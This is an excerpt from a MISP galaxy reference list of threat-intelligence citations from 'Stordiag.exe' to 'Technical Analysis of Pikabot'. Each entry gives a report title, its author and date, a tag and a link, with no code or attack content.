https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-249a-0

Stordiag.exe - LOLBAS Project

LOLBAS. (2021, October 21). Stordiag.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Stordiag.exe - LOLBAS Project"

Table 15527. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Stordiag/

Pentestlab Stored Credentials

netbiosX. (2017, April 19). Stored Credentials. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="Pentestlab Stored Credentials"

Table 15528. Table References

Links

https://pentestlab.blog/2017/04/19/stored-credentials/

store_pwd_rev_enc

Microsoft. (2021, October 28). Store passwords using reversible encryption. Retrieved January 3, 2022.

The tag is: misp-galaxy:references="store_pwd_rev_enc"

Table 15529. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption

IBM Storwize

IBM Support. (2017, April 26). Storwize USB Initialization Tool may contain malicious code. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="IBM Storwize"

Table 15530. Table References

Links

https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028--OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206--E

G Data Sodinokibi June 2019

Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="G Data Sodinokibi June 2019"

Table 15531. Table References

Links

https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data

Windows Blogs Microsoft Edge Sandbox

Cowan, C. (2017, March 23). Strengthening the Microsoft Edge Sandbox. Retrieved March 12, 2018.

The tag is: misp-galaxy:references="Windows Blogs Microsoft Edge Sandbox"

Table 15532. Table References

Links

https://blogs.windows.com/msedgedev/2017/03/23/strengthening-microsoft-edge-sandbox/

Symantec Strider Blog

Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016.

The tag is: misp-galaxy:references="Symantec Strider Blog"

Table 15533. Table References

Links

http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets

Cybereason StrifeWater Feb 2022

Cybereason Nocturnus. (2022, February 1). StrifeWater RAT: Iranian APT Moses Staff Adds New Trojan to Ransomware Operations. Retrieved August 15, 2022.

The tag is: misp-galaxy:references="Cybereason StrifeWater Feb 2022"

Table 15534. Table References

Links

https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations

Bitdefender StrongPity June 2020

Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.

The tag is: misp-galaxy:references="Bitdefender StrongPity June 2020"

Table 15535. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf

Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020

Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.

The tag is: misp-galaxy:references="Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020"

Table 15536. Table References

Links

https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/

ESET Stuxnet Under the Microscope

Matrosov, A., Rodionov, E., Harley, D., Malcho, J. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.

The tag is: misp-galaxy:references="ESET Stuxnet Under the Microscope"

Table 15537. Table References

Links

https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf

subTee .NET Profilers May 2017

Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET Profilers. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="subTee .NET Profilers May 2017"

Table 15538. Table References

Links

https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html

SpectorOps Subverting Trust Sept 2017

Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.

The tag is: misp-galaxy:references="SpectorOps Subverting Trust Sept 2017"

Table 15539. Table References

Links

https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf

Symantec Suckfly March 2016

DiMaggio, J. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Symantec Suckfly March 2016"

Table 15540. Table References

Links

http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates

sudo man page 2018

Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="sudo man page 2018"

Table 15541. Table References

Links

https://www.sudo.ws/

FireEye SUNBURST Additional Details Dec 2020

Stephen Eckels, Jay Smith, William Ballenthin. (2020, December 24). SUNBURST Additional Technical Details. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="FireEye SUNBURST Additional Details Dec 2020"

Table 15542. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html

Check Point Sunburst Teardrop December 2020

Check Point Research. (2020, December 22). SUNBURST, TEARDROP and the NetSec New Normal. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="Check Point Sunburst Teardrop December 2020"

Table 15543. Table References

Links

https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/

CheckPoint Sunburst & Teardrop December 2020

Check Point Research. (2020, December 22). SUNBURST, TEARDROP and the NetSec New Normal. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="CheckPoint Sunburst & Teardrop December 2020"

Table 15544. Table References

Links

https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/

CrowdStrike SUNSPOT Implant January 2021

CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.

The tag is: misp-galaxy:references="CrowdStrike SUNSPOT Implant January 2021"

Table 15545. Table References

Links

https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/

Kaspersky Superfish

Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.

The tag is: misp-galaxy:references="Kaspersky Superfish"

Table 15546. Table References

Links

https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/

Unit42 SUPERNOVA Dec 2020

Tennis, M. (2020, December 17). SUPERNOVA: A Novel .NET Webshell. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Unit42 SUPERNOVA Dec 2020"

Table 15547. Table References

Links

https://unit42.paloaltonetworks.com/solarstorm-supernova/

Guidepoint SUPERNOVA Dec 2020

Riley, W. (2020, December 1). SUPERNOVA SolarWinds .NET Webshell Analysis. Retrieved February 18, 2021.

The tag is: misp-galaxy:references="Guidepoint SUPERNOVA Dec 2020"

Table 15548. Table References

Links

https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/

00sec Droppers

0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="00sec Droppers"

Table 15549. Table References

Links

https://0x00sec.org/t/super-stealthy-droppers/3715

FireEyeSupplyChain

FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to Sunshop. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="FireEyeSupplyChain"

Table 15550. Table References

Links

https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop

Moran 2013

Moran, N., & Villeneuve, N. (2013, August 12). Survival of the Fittest: New York Times Attackers Evolve Quickly [Blog]. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Moran 2013"

Table 15551. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html

Dell Threat Group 2889

Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="Dell Threat Group 2889"

Table 15552. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/

Mandiant UNC3890 Aug 2022

Mandiant Israel Research Team. (2022, August 17). Suspected Iranian Actor Targeting Israeli Shipping, Healthcare, Government and Energy Sectors. Retrieved September 21, 2022.

The tag is: misp-galaxy:references="Mandiant UNC3890 Aug 2022"

Table 15553. Table References

Links

https://www.mandiant.com/resources/blog/suspected-iranian-actor-targeting-israeli-shipping

Suspected Russian Activity Targeting Government and Business Entities Around the Globe

Luke Jenkins, Sarah Hawley, Parnian Najafi, Doug Bienstock. (2021, December 6). Suspected Russian Activity Targeting Government and Business Entities Around the Globe. Retrieved April 15, 2022.

The tag is: misp-galaxy:references="Suspected Russian Activity Targeting Government and Business Entities Around the Globe"

Table 15554. Table References

Links

https://www.mandiant.com/resources/russian-targeting-gov-business

U.S. CISA APT29 Cloud Access

Cybersecurity and Infrastructure Security Agency. (2024, February 26). SVR Cyber Actors Adapt Tactics for Initial Cloud Access. Retrieved March 1, 2024.

The tag is: misp-galaxy:references="U.S. CISA APT29 Cloud Access"

Table 15555. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-057a

Recorded Future Turla Infra 2020

Insikt Group. (2020, March 12). Swallowing the Snake’s Tail: Tracking Turla Infrastructure. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Recorded Future Turla Infra 2020"

Table 15556. Table References

Links

https://www.recordedfuture.com/turla-apt-infrastructure/

Microsoft Sxstrace

Gerend, J. et al. (2017, October 16). sxstrace. Retrieved April 26, 2021.

The tag is: misp-galaxy:references="Microsoft Sxstrace"

Table 15557. Table References

Links

https://docs.microsoft.com/windows-server/administration/windows-commands/sxstrace

Alienvault Sykipot DOD Smart Cards

Blasco, J. (2012, January 12). Sykipot variant hijacks DOD and Windows smart cards. Retrieved January 10, 2016.

The tag is: misp-galaxy:references="Alienvault Sykipot DOD Smart Cards"

Table 15558. Table References

Links

https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards

SecureList SynAck Doppelgänging May 2018

Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelgänging technique. Retrieved May 22, 2018.

The tag is: misp-galaxy:references="SecureList SynAck Doppelgänging May 2018"

Table 15559. Table References

Links

https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/

SyncAppvPublishingServer.exe - LOLBAS Project

LOLBAS. (2018, May 25). SyncAppvPublishingServer.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="SyncAppvPublishingServer.exe - LOLBAS Project"

Table 15560. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/

Syncappvpublishingserver.vbs - LOLBAS Project

LOLBAS. (2018, May 25). Syncappvpublishingserver.vbs. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Syncappvpublishingserver.vbs - LOLBAS Project"

Table 15561. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/

Mandiant - Synful Knock

Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Mandiant - Synful Knock"

Table 15562. Table References

Links

https://www.mandiant.com/resources/synful-knock-acis

Sysmon EID 9

Russinovich, R. & Garnier, T. (2021, August 18). Sysmon Event ID 9. Retrieved September 24, 2021.

The tag is: misp-galaxy:references="Sysmon EID 9"

Table 15563. Table References

Links

https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread

Microsoft Sysmon v6 May 2017

Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.

The tag is: misp-galaxy:references="Microsoft Sysmon v6 May 2017"

Table 15564. Table References

Links

https://docs.microsoft.com/sysinternals/downloads/sysmon

Syssetup.dll - LOLBAS Project

LOLBAS. (2018, May 25). Syssetup.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Syssetup.dll - LOLBAS Project"

Table 15565. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Syssetup/

System and kernel extensions in macOS

Apple. (n.d.). System and kernel extensions in macOS. Retrieved March 31, 2022.

The tag is: misp-galaxy:references="System and kernel extensions in macOS"

Table 15566. Table References

Links

https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web

Linux man-pages: systemd January 2014

Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Linux man-pages: systemd January 2014"

Table 15567. Table References

Links

http://man7.org/linux/man-pages/man1/systemd.1.html

FreeDesktop Journal

freedesktop.org. (n.d.). systemd-journald.service. Retrieved June 15, 2022.

The tag is: misp-galaxy:references="FreeDesktop Journal"

Table 15568. Table References

Links

https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html

Ubuntu Manpage systemd rc

Canonical Ltd. (n.d.). systemd-rc-local-generator - Compatibility generator for starting /etc/rc.local and /usr/sbin/halt.local during boot and shutdown. Retrieved February 23, 2021.

The tag is: misp-galaxy:references="Ubuntu Manpage systemd rc"

Table 15569. Table References

Links

http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html

freedesktop systemd.service

Free Desktop. (n.d.). systemd.service — Service unit configuration. Retrieved March 20, 2023.

The tag is: misp-galaxy:references="freedesktop systemd.service"

Table 15570. Table References

Links

https://www.freedesktop.org/software/systemd/man/systemd.service.html

Systemd Service Units

Freedesktop.org. (n.d.). systemd.service — Service unit configuration. Retrieved March 16, 2020.

The tag is: misp-galaxy:references="Systemd Service Units"

Table 15571. Table References

Links

https://www.freedesktop.org/software/systemd/man/systemd.service.html

systemdsleep Linux

Man7. (n.d.). systemd-sleep.conf(5) — Linux manual page. Retrieved June 7, 2023.

The tag is: misp-galaxy:references="systemdsleep Linux"

Table 15572. Table References

Links

https://man7.org/linux/man-pages/man5/systemd-sleep.conf.5.html

Freedesktop.org Linux systemd 29SEP2018

Freedesktop.org. (2018, September 29). systemd System and Service Manager. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Freedesktop.org Linux systemd 29SEP2018"

Table 15573. Table References

Links

https://www.freedesktop.org/wiki/Software/systemd/

archlinux Systemd Timers Aug 2020

archlinux. (2020, August 11). systemd/Timers. Retrieved October 12, 2020.

The tag is: misp-galaxy:references="archlinux Systemd Timers Aug 2020"

Table 15574. Table References

Links

https://wiki.archlinux.org/index.php/Systemd/Timers

TechNet Systeminfo

Microsoft. (n.d.). Systeminfo. Retrieved April 8, 2016.

The tag is: misp-galaxy:references="TechNet Systeminfo"

Table 15575. Table References

Links

https://technet.microsoft.com/en-us/library/bb491007.aspx

Peripheral Discovery macOS

SS64. (n.d.). system_profiler. Retrieved March 11, 2022.

The tag is: misp-galaxy:references="Peripheral Discovery macOS"

Table 15576. Table References

Links

https://ss64.com/osx/system_profiler.html

MSDN System Time

Microsoft. (n.d.). System Time. Retrieved November 25, 2016.

The tag is: misp-galaxy:references="MSDN System Time"

Table 15577. Table References

Links

https://msdn.microsoft.com/ms724961.aspx

T1562.002_redcanaryco

redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.

The tag is: misp-galaxy:references="T1562.002_redcanaryco"

Table 15578. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md

Palo Alto T9000 Feb 2016

Grunzweig, J. and Miller-Osborn, J. (2016, February 4). T9000: Advanced Modular Backdoor Uses Complex Anti-Analysis Techniques. Retrieved April 15, 2016.

The tag is: misp-galaxy:references="Palo Alto T9000 Feb 2016"

Table 15579. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/

US-CERT TA18-068A 2018

US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.

The tag is: misp-galaxy:references="US-CERT TA18-068A 2018"

Table 15580. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA18-086A

Proofpoint TA416 November 2020

Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021.

The tag is: misp-galaxy:references="Proofpoint TA416 November 2020"

Table 15581. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader

NCC Group TA505

Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="NCC Group TA505"

Table 15582. Table References

Links

https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/

ProofPoint SettingContent-ms July 2018

Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="ProofPoint SettingContent-ms July 2018"

Table 15583. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat

IBM TA505 April 2020

Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.

The tag is: misp-galaxy:references="IBM TA505 April 2020"

Table 15584. Table References

Links

https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/

Proofpoint TA505 October 2019

Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.

The tag is: misp-galaxy:references="Proofpoint TA505 October 2019"

Table 15585. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

Proofpoint TA505 June 2018

Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="Proofpoint TA505 June 2018"

Table 15586. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times

TrendMicro TA505 Aug 2019

Trend Micro. (2019, August 27). TA505: Variety in Use of ServHelper and FlawedAmmyy. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="TrendMicro TA505 Aug 2019"

Table 15587. Table References

Links

https://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html

Unit 42 TA551 Jan 2021

Duncan, B. (2021, January 7). TA551: Email Attack Campaign Switches from Valak to IcedID. Retrieved March 17, 2021.

The tag is: misp-galaxy:references="Unit 42 TA551 Jan 2021"

Table 15588. Table References

Links

https://unit42.paloaltonetworks.com/ta551-shathak-icedid/

IBM TA577 OneNote Malspam

IBM X-Force. (2023, May 30). TA577 OneNote Malspam Results in QakBot Deployment. Retrieved January 24, 2024.

The tag is: misp-galaxy:references="IBM TA577 OneNote Malspam"

Table 15589. Table References

Links

https://exchange.xforce.ibmcloud.com/threats/guid:7f0659d266174b9a9ba40c618b853782

Cobalt Strike TTPs Dec 2017

Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Cobalt Strike TTPs Dec 2017"

Table 15590. Table References

Links

https://www.cobaltstrike.com/downloads/reports/tacticstechniquesandprocedures.pdf

Reuters Taiwan BlackTech August 2020

Lee, Y. (2020, August 19). Taiwan says China behind cyberattacks on government agencies, emails. Retrieved April 6, 2022.

The tag is: misp-galaxy:references="Reuters Taiwan BlackTech August 2020"

Table 15591. Table References

Links

https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK

Microsoft Process Snapshot

Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="Microsoft Process Snapshot"

Table 15592. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx

Lacework TeamTNT May 2021

Stroud, J. (2021, May 25). Taking TeamTNT’s Docker Images Offline. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Lacework TeamTNT May 2021"

Table 15593. Table References

Links

https://www.lacework.com/blog/taking-teamtnt-docker-images-offline/

Splunk Kovar Certificates 2017

Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Splunk Kovar Certificates 2017"

Table 15594. Table References

Links

https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html

Dragos TALONITE

Dragos. (n.d.). TALONITE. Retrieved February 25, 2021.

The tag is: misp-galaxy:references="Dragos TALONITE"

Table 15595. Table References

Links

https://www.dragos.com/threat/talonite/

Talos Sodinokibi April 2019

Cadieux, P. et al. (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="Talos Sodinokibi April 2019"

Table 15596. Table References

Links

https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html

Medium Event Tracing Tampering 2018

Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.

The tag is: misp-galaxy:references="Medium Event Tracing Tampering 2018"

Table 15597. Table References

Links

https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63

Tar.exe - LOLBAS Project

LOLBAS. (2023, January 30). Tar.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Tar.exe - LOLBAS Project"

Table 15598. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Tar/

Netskope GCP Redirection

Ashwin Vamshi. (2019, January 24). Targeted Attacks Abusing Google Cloud Platform Open Redirection. Retrieved August 18, 2022.

The tag is: misp-galaxy:references="Netskope GCP Redirection"

Table 15599. Table References

Links

https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection

AhnLab Andariel Subgroup of Lazarus June 2018

AhnLab. (2018, June 23). Targeted attacks by Andariel Threat Group, a subgroup of the Lazarus. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="AhnLab Andariel Subgroup of Lazarus June 2018"

Table 15600. Table References

Links

http://download.ahnlab.com/global/brochure/%5BAnalysis%5DAndariel_Group.pdf

dharma_ransomware

Loui, E. Scheuerman, K. et al. (2020, April 16). Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques. Retrieved January 26, 2022.

The tag is: misp-galaxy:references="dharma_ransomware"

Table 15601. Table References

Links

https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/

Targeted SSL Stripping Attacks Are Real

Check Point. (n.d.). Targeted SSL Stripping Attacks Are Real. Retrieved May 24, 2023.

The tag is: misp-galaxy:references="Targeted SSL Stripping Attacks Are Real"

Table 15602. Table References

Links

https://blog.checkpoint.com/research/targeted-ssl-stripping-attacks-are-real/amp/

CFR Vaccine Development Threats

Council on Foreign Relations. (2020, November 28). Targeting of companies involved in vaccine development. Retrieved October 30, 2023.

The tag is: misp-galaxy:references="CFR Vaccine Development Threats"

Table 15603. Table References

Links

https://www.cfr.org/cyber-operations/targeting-companies-involved-vaccine-development

Tarrask scheduled task

Microsoft Threat Intelligence Team & Detection and Response Team. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="Tarrask scheduled task"

Table 15604. Table References

Links

https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/

Microsoft Tasklist

Microsoft. (n.d.). Tasklist. Retrieved December 23, 2015.

The tag is: misp-galaxy:references="Microsoft Tasklist"

Table 15605. Table References

Links

https://technet.microsoft.com/en-us/library/bb491010.aspx

Microsoft Tasks

Microsoft. (2018, May 31). Tasks. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft Tasks"

Table 15606. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks

TechNet Task Scheduler Security

Microsoft. (2005, January 21). Task Scheduler and security. Retrieved June 8, 2016.

The tag is: misp-galaxy:references="TechNet Task Scheduler Security"

Table 15607. Table References

Links

https://technet.microsoft.com/en-us/library/cc785125.aspx

tau bundlore erika noerenberg 2020

Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="tau bundlore erika noerenberg 2020"

Table 15608. Table References

Links

https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html

CarbonBlack Conti July 2020

Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021.

The tag is: misp-galaxy:references="CarbonBlack Conti July 2020"

Table 15609. Table References

Links

https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/

CarbonBlack LockerGoga 2019

CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="CarbonBlack LockerGoga 2019"

Table 15610. Table References

Links

https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/

GitHub Turla Driver Loader

TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021.

The tag is: misp-galaxy:references="GitHub Turla Driver Loader"

Table 15611. Table References

Links

https://github.com/hfiref0x/TDL

S1 Old Rat New Tricks

Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="S1 Old Rat New Tricks"

Table 15612. Table References

Links

https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/

Teams.exe - LOLBAS Project

LOLBAS. (2022, January 17). Teams.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Teams.exe - LOLBAS Project"

Table 15613. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/

TeamTNT Cloud Enumeration

Nathaniel Quist. (2021, June 4). TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations. Retrieved February 8, 2022.

The tag is: misp-galaxy:references="TeamTNT Cloud Enumeration"

Table 15614. Table References

Links

https://unit42.paloaltonetworks.com/teamtnt-operations-cloud-environments

Intezer TeamTNT Explosion September 2021

Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021.

The tag is: misp-galaxy:references="Intezer TeamTNT Explosion September 2021"

Table 15615. Table References

Links

https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf

Cisco Talos Intelligence Group

Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022.

The tag is: misp-galaxy:references="Cisco Talos Intelligence Group"

Table 15616. Table References

Links

https://blog.talosintelligence.com/teamtnt-targeting-aws-alibaba-2/

Talos TeamTNT

Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved July 8, 2022.

The tag is: misp-galaxy:references="Talos TeamTNT"

Table 15617. Table References

Links

https://blog.talosintelligence.com/2022/04/teamtnt-targeting-aws-alibaba.html

Cado Security TeamTNT Worm August 2020

Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Cado Security TeamTNT Worm August 2020"

Table 15618. Table References

Links

https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/

ATT TeamTNT Chimaera September 2020

AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="ATT TeamTNT Chimaera September 2020"

Table 15619. Table References

Links

https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera

OSX Coldroot RAT

Patrick Wardle. (2018, February 17). Tearing Apart the Undetected (OSX)Coldroot RAT. Retrieved August 8, 2019.

The tag is: misp-galaxy:references="OSX Coldroot RAT"

Table 15620. Table References

Links

https://objective-see.com/blog/blog_0x2A.html

Kaspersky ProjectSauron Technical Analysis

Kaspersky Lab’s Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Technical Analysis. Retrieved August 17, 2016.

The tag is: misp-galaxy:references="Kaspersky ProjectSauron Technical Analysis"

Table 15621. Table References

Links

https://securelist.com/files/2016/07/The-ProjectSauron-APT_Technical_Analysis_KL.pdf

McAfee Babuk February 2021

Mundo, A. et al. (2021, February). Technical Analysis of Babuk Ransomware. Retrieved August 11, 2021.

The tag is: misp-galaxy:references="McAfee Babuk February 2021"

Table 15622. Table References

Links

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf

McAfee Cuba April 2021

Roccio, T., et al. (2021, April). Technical Analysis of Cuba Ransomware. Retrieved June 18, 2021.

The tag is: misp-galaxy:references="McAfee Cuba April 2021"

Table 15623. Table References

Links

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf

McAfee Dianxun March 2021

Roccia, T., Seret, T., Fokker, J. (2021, March 16). Technical Analysis of Operation Dianxun. Retrieved April 13, 2021.

The tag is: misp-galaxy:references="McAfee Dianxun March 2021"

Table 15624. Table References

Links

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf

Zscaler Pikabot May 24 2023

Brett Stone-Gross, Nikolaos Pantazopoulos. (2023, May 24). Technical Analysis of Pikabot. Retrieved January 11, 2024.

The tag is: misp-galaxy:references="Zscaler Pikabot May 24 2023"

Table 15625. Table References

Links

